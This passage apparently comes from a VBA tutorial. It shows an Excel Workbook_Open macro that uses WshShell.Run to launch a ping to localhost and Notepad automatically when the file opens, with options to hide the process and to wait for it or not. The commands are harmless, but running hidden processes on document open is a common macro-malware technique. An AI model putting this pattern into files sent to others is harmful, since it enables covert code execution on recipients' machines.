WshShell.Run program & " " & arguments & " ", visibility, wait_on_execute
End Sub


These would be called from within the "ThisWorkbook" tab in VBE with a function like:

Const VISIBLE = 1, INVISIBLE = 0
Const WAIT = True, NOWAIT = False

Sub Workbook_Open()
Run_Cmd "ping 127.0.0.1", VISIBLE, WAIT
Run_Program "notepad.exe", "", VISIBLE, NOWAIT
End Sub


INVISIBLE / VISIBLE does just what you would think: toggles the visibility of the program or command as you wish. WAIT / NOWAIT also functions as you would expect; if set to WAIT, the VBA execution will halt until the process finishes. NOWAIT continues execution as soon as the program/command begins.